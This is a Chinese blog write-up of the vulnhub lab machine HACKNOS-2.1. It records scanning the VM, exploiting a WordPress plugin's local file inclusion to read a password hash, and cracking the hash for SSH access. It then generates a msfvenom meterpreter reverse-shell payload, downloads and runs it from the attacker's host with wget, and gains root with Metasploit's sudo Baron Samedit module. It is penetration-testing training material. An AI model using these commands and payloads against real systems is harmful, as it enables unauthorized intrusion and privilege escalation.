
<!DOCTYPE html>
<html>
<head>
     

<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
<title>vulnhub靶机练习-HACKNOS-2.1 | ch1e的随笔</title>
<meta name="author" content="ch1e">
<meta name="copyright" content="ch1e">

<link rel="shortcut icon" href="https://ch1e.cn/img/favicon.png"> 


    <meta name="keywords" content="靶场练习,web安全">



     
    <meta name="description" content="OS-HACKNOS-2.1靶机安装先把靶机设为NAT模式，开机时一直按shift，然后按e  把框内的东西改成rw singke init&#x3D;&#x2F;bin&#x2F;bash，然后ctrl+x进入界面，ip a看一下当前网卡是ens33  12345cd &#x2F;etc&#x2F;netplan&#x2F;lscat *.yaml  这里看自己具体情况把配置的的网卡改成当前的网卡netplan apply   信息搜集nmap -sn">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub靶机练习-HACKNOS-2.1">
<meta property="og:url" content="https://ch1e.cn/2022/03/11/OS-HACKNOS-2.1/">
<meta property="og:site_name" content="ch1e的随笔">
<meta property="og:description" content="OS-HACKNOS-2.1靶机安装先把靶机设为NAT模式，开机时一直按shift，然后按e  把框内的东西改成rw singke init&#x3D;&#x2F;bin&#x2F;bash，然后ctrl+x进入界面，ip a看一下当前网卡是ens33  12345cd &#x2F;etc&#x2F;netplan&#x2F;lscat *.yaml  这里看自己具体情况把配置的的网卡改成当前的网卡netplan apply   信息搜集nmap -sn">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://q4.qlogo.cn/headimg_dl?dst_uin=1444440144&spec=100">
<meta property="article:published_time" content="2022-03-10T16:16:17.580Z">
<meta property="article:modified_time" content="2022-03-10T16:47:09.750Z">
<meta property="article:author" content="ch1e">
<meta property="article:tag" content="靶场练习">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://q4.qlogo.cn/headimg_dl?dst_uin=1444440144&spec=100">
 

<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link href="//cdn.jsdelivr.net" rel="preconnect">
<link href="https://ch1e.cn" rel="prefetch">
<link href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css " rel="stylesheet">
<link href="/css/main.css " rel="stylesheet">
<script src="/js/utlis.js"></script>
 
    
 

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
     
    
 
     

<script>
    var $config = {
        tocStyle: "visible",
        CDN:{
            fancyboxJs: "https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js",
            fancyboxCss: "https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css"
        },
        
        
    }
</script>
    




  


    <div id="body-wrap">
        <nav id="nav-wrap">
  <div class="navbar">
    <div class="bar">
      <a href="/" class="title">ch1e的随笔</a>

      
      <ul class="menu">
         
        <li><a href="/">首页</a></li>
          
        <li>
          <a class="menu-child-hover" href="javascript:void(0);">找文章</a>
          <ul class="menu-child">
            
            <li><a href='/tags'>标签</a></li>
            
            <li><a href='/archives'>归档</a></li>
            
          </ul>
        </li>
          
        <li><a href="/link">友情链接</a></li>
         
      </ul>
      <i class="fas fa-bars open-nav"></i>
    </div>
  </div>
  <div id="mobile-nav">
    <ul>
       
      <li><a href="/">首页</a></li>
         
      <li><a href='/tags'>标签</a></li>
      
      <li><a href='/archives'>归档</a></li>
         
      <li><a href="/link">友情链接</a></li>
       
    </ul>
  </div>
</nav>


        <main id="main">
            

<article id="post">
  <div class="post-info">
    <div class="post-title">
      <h1>vulnhub靶机练习-HACKNOS-2.1</h1>
    </div>
    <div class="post-meta">
      <div class="post-date">
        <i class="far fa-calendar-alt fa-fw post-meta-icon"></i>
        <span class="post-meta-label">
          发表于
            2022-03-11 |
        </span>
        
        <i class="fas fa-history fa-fw post-meta-icon"></i>
        <span class="post-meta-label">
          更新于
            2022-03-17
        </span>
      </div>
      <div class="post-meta-wordcount">
        <i class="far fa-file-word fa-fw post-meta-icon"></i>
        <span class="post-meta-label">总字数:</span>
        <span class="word-count">824 | </span>
        <i class="far fa-clock fa-fw post-meta-icon"></i>
        <span class="post-meta-label">阅读时长:</span>
        <span>3分钟</span>
        
      </div>
    </div>
  </div>
  <div class="post-content">
    <h1 id="OS-HACKNOS-2-1"><a href="#OS-HACKNOS-2-1" class="headerlink" title="OS-HACKNOS-2.1"></a>OS-HACKNOS-2.1</h1><h2 id="靶机安装"><a href="#靶机安装" class="headerlink" title="靶机安装"></a>靶机安装</h2><p>先把靶机设为NAT模式，开机时一直按shift，然后按e</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822153841098.png" alt="image-20210822153841098"></p>
<p>把框内的东西改成rw singke init=/bin/bash，然后ctrl+x进入界面，ip a看一下当前网卡是ens33</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822153949802.png" alt="image-20210822153949802"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cd /etc/netplan/</span><br><span class="line">ls</span><br><span class="line">cat *.yaml  这里看自己具体情况</span><br><span class="line">把配置的的网卡改成当前的网卡</span><br><span class="line">netplan apply</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822154124677.png" alt="image-20210822154124677"></p>
<h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><p>nmap -sn 192.168.169.0/24 扫描当前网段得知靶机ip是192.168.169.141</p>
<p>nmap -sV -sC -A 192.168.169.141</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822101338138.png" alt="image-20210822101338138"></p>
<p>发现目标开启了80 22端口，我们访问一下80端口看看有什么内容，这里访问完以后是Apache2 Ubuntu Default Page，估计网站首页是在某个目录下，我们来扫一波目录</p>
<p>gobuster dir -u <a target="_blank" rel="noopener" href="http://192.168.169.141/">http://192.168.169.141/</a> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt</p>
<p>奇怪的是使用这个字典跑不出来，换一个尝试一下</p>
<p>gobuster dir -u <a target="_blank" rel="noopener" href="http://192.168.169.141/">http://192.168.169.141/</a> -w /usr/share/wordlists/dirb/big.txt     </p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822101827989.png" alt="image-20210822101827989"></p>
<p>扫描到了/tsweb目录，我们访问一下看看，使用一下这个插件，发现他是WordPress5.3的版本，这就可以使用wpscan来看看</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822101909211.png" alt="image-20210822101909211"></p>
<p>wpscan –url <a target="_blank" rel="noopener" href="http://192.168.169.141/tsweb">http://192.168.169.141/tsweb</a> -e vp –api-token TOKEN   这里-e是枚举，vp是易受攻击的插件选项</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822103931415.png" alt="image-20210822103931415"></p>
<p>他是有漏洞的，CVE-2019-9618好像是，wpscan也给了文章，来看看这个<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/46537%EF%BC%8C%E5%B9%B6%E4%B8%94%E7%BB%99%E5%87%BA%E4%BA%86poc">https://www.exploit-db.com/exploits/46537，并且给出了poc</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822104201163.png" alt="image-20210822104201163"></p>
<h2 id="漏洞挖掘"><a href="#漏洞挖掘" class="headerlink" title="漏洞挖掘"></a>漏洞挖掘</h2><p>这是个本地文件包含漏洞，我们使用一下poc来看看是不是能够访问</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822104321938.png" alt="image-20210822104321938"></p>
<p>flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash </p>
<p>我们来解密试试，这里把我们要解密的东西丢到一个文件里，然后使用john解密，字典在/var/share/wordlists/下，rockyou.txt，首次使用需要进行解压，解压命令 gzip -d rockyou.txt.gz</p>
<p>破解命令  john –format=md5crypt –wordlist=/usr/share/wordlists/rockyou.txt 666  这里666是自己创建的文件的名字</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822124451419.png" alt="image-20210822124451419"></p>
<p>我们这里就直接知道了flag的账号密码，可以ssh登陆,ssh <a href="mailto:&#102;&#x6c;&#97;&#x67;&#64;&#49;&#57;&#x32;&#46;&#49;&#54;&#56;&#x2e;&#x31;&#x36;&#x39;&#46;&#49;&#52;&#x31;">&#102;&#x6c;&#97;&#x67;&#64;&#49;&#57;&#x32;&#46;&#49;&#54;&#56;&#x2e;&#x31;&#x36;&#x39;&#46;&#49;&#52;&#x31;</a>,登陆成功</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822124654454.png" alt="image-20210822124654454"></p>
<h2 id="后渗透提权"><a href="#后渗透提权" class="headerlink" title="后渗透提权"></a>后渗透提权</h2><p>我们可以查看一下存在的用户,cat /etc/passwd|grep bash,顺便切换成bash</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822124951829.png" alt="image-20210822124951829"></p>
<p>接下来在/var/backups/passbkp下翻到了一个md5-hash文件，是除了flag和root用户之外的用户的密码</p>
<p>继续解密试试，解密方法依旧是和上面那个一样，这里直接给出吧，然后切换到这个用户</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822130511227.png" alt="image-20210822130511227"></p>
<p>接下来就是来到他的主目录，获取user.txt下的内容</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822130747783.png" alt="image-20210822130747783"></p>
<p>这里还是老方法，使用msf的suggester模块，来进行提权，非常的舒服，具体可以见上一个DomDom靶机的提权，这里直接给出命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.169.134 LPORT=4444 -f elf &gt; payload.elf</span><br><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">payload payload/linux/x64/meterpreter/reverse_tcp</span><br><span class="line">set LHOST 192.168.169.134</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>生成好msf马以后，在目标本机开启 python -m SimpleHTTPServer  然后进入到靶机的tmp目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp</span><br><span class="line">wget http://192.168.169.140:8000/payload.elf</span><br><span class="line">chmod payload.elf 777</span><br><span class="line">./payload.elf</span><br></pre></td></tr></table></figure>

<p>这样就可以获得到一个meterpreter，然后background记住此时的session</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">post/multi/recon/local_exploit_suggester</span><br><span class="line">set SESSION 1</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822132441333.png" alt="image-20210822132441333"></p>
<p>这里我选择了第二个exp，第一个用了打不通</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use exploit/linux/local/sudo_baron_samedit</span><br><span class="line">show options</span><br><span class="line">set SESSION 1</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822132543809.png" alt="image-20210822132543809"></p>
<p>成功获取了root权限，cat /root/root.txt，听懂掌声</p>
<p><img src="https://cdn.jsdelivr.net/gh/ZwqGG/image@main/img/image-20210822132732478.png" alt="image-20210822132732478"></p>

  </div>
   
   

  
  <div class="post-copyright">
    <div class="post-copyright-icon"></div>
      <div class="post-copyright-author">
          <span class="post-copyright-meta">文章作者: </span>
            <span class="post-copyright-info">
              <a href="mailto:1444440144@qq.com" >ch1e</a>
            </span>
      </div>
      <div class="post-copyright-type">
          <span class="post-copyright-meta">文章链接: </span>
            <span class="post-copyright-info">
              <a href="https://ch1e.cn/2022/03/11/OS-HACKNOS-2.1/" >https://ch1e.cn/2022/03/11/OS-HACKNOS-2.1/</a>
            </span>
      </div><div class="post-copyright-notice">
          <span class="post-copyright-meta">版权声明: </span>
            <span class="post-copyright-info">本博客所有文章除特别声明外，均采用
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/ " target="_blank" >
                  CC BY-NC-SA 4.0 </a> 许可协议。转载请注明来自
              <a href="https://ch1e.cn/2022/03/11/OS-HACKNOS-2.1/" target="_blank" >ch1e</a>
              ！</span>
      </div>
  </div>
  


 

  
    <div class="post-tag">
        <span>
            <i class="fa fa-tag"></i>
             
            <a href="tags/靶场练习/"><span>靶场练习</span></a>
                
                    <i class="fas fa-angle-right"></i>
                
             
            <a href="tags/web安全/"><span>web安全</span></a>
                
            
        </span>
    </div>
  




<div class="pagination-post">
    
    <a href="/2022/03/17/shiro550/">
      <div class="prev-title"><i class="fas fa-chevron-left"></i>Shiro-550反序列化浅析</div>
      <div class="prev-desc">前言最近摸鱼了比较久了，处理了一些协会内的事然后也想着稍微让自己轻松一点，就休息了几天哈哈，所以就自从上次把博客整体换了个主题以后，就比较摆烂，中途还看了一遍关于内网的书，整理了一些笔记，然后准...</div>
    </a>
    
    
    <a href="/2022/03/11/Os-hackNos-1/">
      <div class="next-title">vulnhub靶机练习-Os-hackNos-1<i class="fas fa-chevron-right"></i></div>
      <div class="next-desc">vulnhub靶机练习-Os-hackNos-1靶机下载地址：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
难度：容易-中级
Fla...</div>
    </a>
    
</div>

</article>
 


  <div id="toc-wrap">
    <div id="toc">
      <div class="toc-title">
        <div>
          目录
            <span class="num">0%</span>
        </div>
        <progress class="progress" value="0" max="100"></progress>
      </div>
      <div class="toc-list">
         
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#OS-HACKNOS-2-1"><span class="toc-text">OS-HACKNOS-2.1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA%E5%AE%89%E8%A3%85"><span class="toc-text">靶机安装</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-text">信息搜集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98"><span class="toc-text">漏洞挖掘</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E6%B8%97%E9%80%8F%E6%8F%90%E6%9D%83"><span class="toc-text">后渗透提权</span></a></li></ol></li></ol>
      </div>
    </div>
  </div>


        </main>
        <section id="rightside">
    
    <div class="rightside-item">
        
        
         
        
        
            <a id="open-toc" title="目录">
                <i class="fas fa-list-ul"></i>
            </a>
        
         
         
        <a href="javascript:(0)" id="darkmode" title="深色/浅色 ">
            <i class="fas fa-moon"></i>
        </a>
         
        
        <a href="#" title="回到顶部">
            <i class="fas fa-arrow-up"></i>
        </a>
    </div>
</section>
         

<footer class="footer" id="footer">
    <div class="copyright">
      &copy; 2020 - 2022
        <i class="fas fa-fan"></i>
        ch1e
    </div>
    <div class="framework-info">
        <span>框架 </span>
        <a href="https://hexo.io" target="_blank">Hexo</a>
        <span class="footer-separator">|</span>
        <span>主题 </span>
        <a href="https://github.com/lete114/hexo-theme-MengD" target="_blank">MengD.(萌典) </a>
    </div>
    
    <div class="custom-text">我相信我可以，但我一直在路上，所以我有无限的可能！！</div>
</footer>
    </div>
    <div id="mask" onclick="closeAll()"></div>
    
    <div class="script">
        <script src="/js/main.js"></script>
        

 
<script>
    var originTitle = document.title;
    var titleTime;
    document.addEventListener("visibilitychange", function () {
        if (document.hidden) {
            document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
            clearTimeout(titleTime);
        } else {
            document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
            titleTime = setTimeout(function () {
                document.title = originTitle;
            }, 2000);
        }
    });
</script>


<script src="/js/lazyload.js"></script>


    


        
    <script>
        getScript('https://cdn.jsdelivr.net/npm/pjax/pjax.min.js',LoadPjax)
        function LoadPjax() {
            var pjax = new Pjax({
                selectors: [
                    'head title',
                    'head meta[name="keywords"]',
                    'head meta[name="description"]',
                    'main',
                    '#rightside'
                ],
                cache: true,
                cacheBust: false
            });
        }

        // 清除时间
        var timer = null;
        // 执行进度条
        function ProgressStart() {
            // 设置初始进度
            var progress = 10;
            // 创建进度条 及 css样式
            var div = document.createElement('div');
            div.className = 'pjax-progress';
            document.body.prepend(div);
            // 定义随机数最大值最小值
            var max = 10, mini = 3;
            var result = max - mini;
            // 清除
            clearInterval(timer);
            // 0.5秒内累加进度
            timer = setInterval(function () {
                // 随机数
                var num = parseInt(Math.random() * result);
                var randomResult = num + mini;
                // 累加
                progress += randomResult
                document.getElementsByClassName('pjax-progress')[0].style.width = progress + '%';
                // 当进度达到95%时停止
                if (progress > 95) progress = 95
            }, 500)
        }
        // 加载进度条加载完毕
        function ProgressFinish() {
            clearInterval(timer);
            // 页面加载完毕后进度100% 并在0.7秒后删除
            var progress = document.getElementsByClassName('pjax-progress');
            progress[0].style.width = '100%';
            timer = setTimeout(function () {
                progress[0].parentNode.removeChild(progress[0])
            }, 700);
        }

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
            // 执行进度条
            ProgressStart()
        });
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {

            // 加载进度条加载完毕
            ProgressFinish()
            // 执行所有方法
            exeAllFn()

            
                // 图片懒加载
                ImgLazyLoad('body img[data-img]', 'data-img')
            


            document.querySelectorAll('script[data-pjax]').forEach(item => {
                const newScript = document.createElement('script')
                const content = item.text || item.textContent || item.innerHTML || ''
                Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
                newScript.appendChild(document.createTextNode(content))
                item.parentNode.replaceChild(newScript, item)
            })
        });

        // Pjax请求错误时，跳转到404页面
        document.addEventListener('pjax:error', (err) => {
            if (err.request.status === 404) {
                pjax.loadUrl('/404.html')
            }
        })
    </script>

    </div>
</body>

</html>